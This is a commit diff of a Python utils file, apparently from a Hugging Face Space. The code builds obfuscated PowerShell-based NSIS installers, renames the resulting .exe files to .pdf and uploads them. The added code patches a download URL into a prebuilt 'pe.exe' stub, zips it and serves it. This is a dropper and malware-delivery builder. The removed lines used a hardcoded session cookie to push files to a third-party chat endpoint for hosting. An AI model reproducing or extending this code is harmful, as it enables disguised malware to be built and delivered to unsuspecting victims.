Spaces:
Sleeping
Sleeping
Update utils.py
Browse files
utils.py
CHANGED
@@ -8,32 +8,15 @@ import shutil
|
|
8 |
import tempfile
|
9 |
import requests
|
10 |
import json
|
|
|
11 |
|
12 |
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
|
13 |
UPLOAD_FOLDER = os.path.join(BASE_DIR, "uploads")
|
|
|
14 |
COMPILE_FOLDER = os.path.join(BASE_DIR, "compile")
|
15 |
NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system
|
16 |
OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1")
|
17 |
-
|
18 |
-
SERVER_URL = "https://chiselapp.com/user/yolovi5126/repository/yolovi5126/chat-send"
|
19 |
-
HEADERS = {
|
20 |
-
"Host": "chiselapp.com",
|
21 |
-
"Connection": "keep-alive",
|
22 |
-
"Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarytI7POOg3X2lgL1Yr",
|
23 |
-
"sec-ch-ua-platform": '"Linux"',
|
24 |
-
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
|
25 |
-
"sec-ch-ua": '"Google Chrome";v="131", "Chromium";v="131", "Not_A Brand";v="24"',
|
26 |
-
"sec-ch-ua-mobile": "?0",
|
27 |
-
"Accept": "*/*",
|
28 |
-
"Origin": "https://chiselapp.com",
|
29 |
-
"Sec-Fetch-Site": "same-origin",
|
30 |
-
"Sec-Fetch-Mode": "cors",
|
31 |
-
"Sec-Fetch-Dest": "empty",
|
32 |
-
"Referer": "https://chiselapp.com/user/yolovi5126/repository/yolovi5126/chat",
|
33 |
-
"Accept-Encoding": "gzip, deflate, br, zstd",
|
34 |
-
"Accept-Language": "en-US,en;q=0.9,hi;q=0.8",
|
35 |
-
"Cookie": "fossil-9889a3796fb4c84c=0F6BFEC5A6792BA30BBCFC1F12F0E31772D58BD8F0B1CAE22E%2F9889a3796fb4c84c%2Fyolovi5126; PHPSESSID=7onhpb9ebdpja4nd20ulce9b63"
|
36 |
-
}
|
37 |
|
38 |
def generate_random_string(length=8):
|
39 |
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
|
@@ -87,6 +70,7 @@ def generate_nsi_script(folder_path, bin_file, ps1_file):
|
|
87 |
SetCompressorDictSize 96
|
88 |
SetDatablockOptimize ON
|
89 |
; Interface settings
|
|
|
90 |
!define MUI_WELCOMEPAGE_TITLE "Welcome to ProductName Setup"
|
91 |
!define MUI_WELCOMEPAGE_TEXT "This will install ProductName on your computer.$\r$\n$\r$\nClick Install to continue."
|
92 |
; Pages
|
@@ -138,63 +122,75 @@ def compile_nsi_script(nsi_file_path):
|
|
138 |
|
139 |
def upload_file_to_server(file_path):
|
140 |
try:
|
141 |
-
# Rename the file to
|
142 |
-
|
143 |
-
os.rename(file_path,
|
144 |
-
|
145 |
-
#
|
146 |
-
|
147 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
148 |
|
149 |
-
|
150 |
-
|
151 |
-
|
152 |
-
data = {
|
153 |
-
'lmtime': '2024-12-31T18:33:58'
|
154 |
-
}
|
155 |
|
156 |
-
|
157 |
-
|
158 |
|
159 |
-
|
160 |
-
|
161 |
-
|
162 |
-
|
163 |
-
|
164 |
-
|
165 |
-
|
166 |
-
|
167 |
-
|
168 |
-
|
169 |
-
|
170 |
-
|
171 |
-
|
172 |
-
|
173 |
-
|
174 |
-
|
175 |
-
|
176 |
-
|
177 |
-
|
178 |
-
|
179 |
-
|
180 |
-
|
181 |
-
|
182 |
-
|
183 |
-
|
184 |
-
|
185 |
-
|
186 |
-
|
187 |
-
|
188 |
-
|
189 |
-
|
190 |
-
|
191 |
-
|
192 |
-
|
193 |
-
|
194 |
-
|
195 |
-
|
|
|
|
|
|
|
|
|
196 |
except Exception as e:
|
197 |
-
raise Exception(f"
|
198 |
|
199 |
def process_request(request):
|
200 |
temp_dir = None # Initialize temp_dir to be used in the finally block
|
@@ -217,7 +213,9 @@ def process_request(request):
|
|
217 |
|
218 |
# Create the PowerShell script with the provided content
|
219 |
ps1_content = f'''
|
220 |
-
|
|
|
|
|
221 |
'''
|
222 |
ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
|
223 |
with open(ps1_path, 'w') as ps1_file:
|
@@ -241,8 +239,30 @@ Your PowerShell script content here
|
|
241 |
# Upload the resulting EXE file (renamed to PDF) to the server
|
242 |
download_url = upload_file_to_server(installer_output)
|
243 |
|
244 |
-
#
|
245 |
-
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
246 |
|
247 |
except Exception as e:
|
248 |
current_app.logger.error(f"An error occurred: {str(e)}")
|
|
|
8 |
import tempfile
|
9 |
import requests
|
10 |
import json
|
11 |
+
import zipfile
|
12 |
|
13 |
BASE_DIR = os.path.abspath(os.path.dirname(__file__))
|
14 |
UPLOAD_FOLDER = os.path.join(BASE_DIR, "uploads")
|
15 |
+
PE_FOLDER = os.path.join(BASE_DIR, "pe")
|
16 |
COMPILE_FOLDER = os.path.join(BASE_DIR, "compile")
|
17 |
NSIS_COMPILER = "makensis" # Ensure NSIS is installed on your Linux system
|
18 |
OBFUSCATOR_SCRIPT = os.path.join(BASE_DIR, "Obfus", "main.ps1")
|
19 |
+
UPLOAD_URL = 'http://127.0.0.1:5001/upload' # Replace with actual IP or domain
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
20 |
|
21 |
def generate_random_string(length=8):
|
22 |
return ''.join(random.choices(string.ascii_letters + string.digits, k=length))
|
|
|
70 |
SetCompressorDictSize 96
|
71 |
SetDatablockOptimize ON
|
72 |
; Interface settings
|
73 |
+
!define MUI_ICON "C:\Users\Albert\Downloads\app.ico"
|
74 |
!define MUI_WELCOMEPAGE_TITLE "Welcome to ProductName Setup"
|
75 |
!define MUI_WELCOMEPAGE_TEXT "This will install ProductName on your computer.$\r$\n$\r$\nClick Install to continue."
|
76 |
; Pages
|
|
|
122 |
|
123 |
def upload_file_to_server(file_path):
|
124 |
try:
|
125 |
+
# Rename the .exe file to .pdf
|
126 |
+
renamed_file_path = file_path.replace('.exe', '.pdf')
|
127 |
+
os.rename(file_path, renamed_file_path)
|
128 |
+
|
129 |
+
# Upload the renamed file to the server
|
130 |
+
with open(renamed_file_path, 'rb') as file:
|
131 |
+
response = requests.post(UPLOAD_URL, files={'file': file})
|
132 |
+
|
133 |
+
if response.status_code == 200:
|
134 |
+
data = response.json()
|
135 |
+
# Assuming the server returns a 'file_url' key with the file URL
|
136 |
+
filename = os.path.basename(renamed_file_path)
|
137 |
+
fixed_url = f'http://127.0.0.1:5001/uploads/{filename}' # Fixed URL format
|
138 |
+
return fixed_url
|
139 |
+
else:
|
140 |
+
raise Exception(f"Failed to upload file: {response.json()}")
|
141 |
+
except Exception as e:
|
142 |
+
raise Exception(f"Error during file upload: {str(e)}")
|
143 |
|
144 |
+
def replace_url_in_exe(file_path, old_url, new_url, old_string, new_string):
|
145 |
+
if len(new_url) > len(old_url):
|
146 |
+
raise ValueError("New URL must not be longer than the old URL.")
|
|
|
|
|
|
|
147 |
|
148 |
+
new_url_padded = new_url.ljust(len(old_url), '\x00')
|
149 |
+
new_string_padded = new_string.ljust(len(old_string), '\x00')
|
150 |
|
151 |
+
try:
|
152 |
+
with open(file_path, 'rb') as exe_file:
|
153 |
+
data = exe_file.read()
|
154 |
+
|
155 |
+
# Try different encodings of the old URL
|
156 |
+
encodings = ['utf-8', 'ascii', 'utf-16le']
|
157 |
+
url_found = False
|
158 |
+
for encoding in encodings:
|
159 |
+
old_url_bytes = old_url.encode(encoding)
|
160 |
+
if old_url_bytes in data:
|
161 |
+
print(f"URL found with encoding: {encoding}")
|
162 |
+
url_found = True
|
163 |
+
break
|
164 |
+
if not url_found:
|
165 |
+
raise ValueError(f"The URL {old_url} was not found in the executable using any common encoding.")
|
166 |
+
|
167 |
+
# Try different encodings for the old string
|
168 |
+
string_found = False
|
169 |
+
for encoding in encodings:
|
170 |
+
old_string_bytes = old_string.encode(encoding)
|
171 |
+
if old_string_bytes in data:
|
172 |
+
print(f"String found with encoding: {encoding}")
|
173 |
+
string_found = True
|
174 |
+
break
|
175 |
+
if not string_found:
|
176 |
+
raise ValueError(f"The string {old_string} was not found in the executable using any common encoding.")
|
177 |
+
|
178 |
+
# Replace the old URL with the new URL
|
179 |
+
new_url_bytes = new_url_padded.encode(encoding)
|
180 |
+
modified_data = data.replace(old_url_bytes, new_url_bytes, 1)
|
181 |
+
|
182 |
+
# Replace the old string with the new string
|
183 |
+
new_string_bytes = new_string_padded.encode(encoding)
|
184 |
+
modified_data = modified_data.replace(old_string_bytes, new_string_bytes, 1)
|
185 |
+
|
186 |
+
# Save the modified executable with a random name
|
187 |
+
modified_file_path = os.path.join(os.path.dirname(file_path), generate_random_string() + ".exe")
|
188 |
+
with open(modified_file_path, 'wb') as modified_file:
|
189 |
+
modified_file.write(modified_data)
|
190 |
+
|
191 |
+
return modified_file_path
|
192 |
except Exception as e:
|
193 |
+
raise Exception(f"An error occurred: {e}")
|
194 |
|
195 |
def process_request(request):
|
196 |
temp_dir = None # Initialize temp_dir to be used in the finally block
|
|
|
213 |
|
214 |
# Create the PowerShell script with the provided content
|
215 |
ps1_content = f'''
|
216 |
+
|
217 |
+
|
218 |
+
Write-Host ""
|
219 |
'''
|
220 |
ps1_path = os.path.join(temp_dir, generate_random_string() + ".ps1")
|
221 |
with open(ps1_path, 'w') as ps1_file:
|
|
|
239 |
# Upload the resulting EXE file (renamed to PDF) to the server
|
240 |
download_url = upload_file_to_server(installer_output)
|
241 |
|
242 |
+
# Print the new string and new URL for debugging
|
243 |
+
new_string = os.path.basename(download_url)
|
244 |
+
new_url = download_url
|
245 |
+
print(f"new_string: {new_string}")
|
246 |
+
print(f"new_url: {new_url}")
|
247 |
+
|
248 |
+
# Replace URL in PE executable
|
249 |
+
pe_exe_path = os.path.join(PE_FOLDER, "pe.exe")
|
250 |
+
modified_pe_path = replace_url_in_exe(
|
251 |
+
file_path=pe_exe_path,
|
252 |
+
old_url="http://127.0.0.1:5000/uploads/setup_20250102_062242.pdf",
|
253 |
+
new_url=download_url,
|
254 |
+
old_string="setup_20250102_062243.pdf",
|
255 |
+
new_string=os.path.basename(download_url)
|
256 |
+
)
|
257 |
+
|
258 |
+
# Zip the modified executable
|
259 |
+
zip_filename = generate_random_string() + ".zip"
|
260 |
+
zip_filepath = os.path.join(temp_dir, zip_filename)
|
261 |
+
with zipfile.ZipFile(zip_filepath, 'w') as zipf:
|
262 |
+
zipf.write(modified_pe_path, os.path.basename(modified_pe_path))
|
263 |
+
|
264 |
+
# Return the zip file in the response
|
265 |
+
return send_file(zip_filepath, as_attachment=True, download_name=zip_filename)
|
266 |
|
267 |
except Exception as e:
|
268 |
current_app.logger.error(f"An error occurred: {str(e)}")
|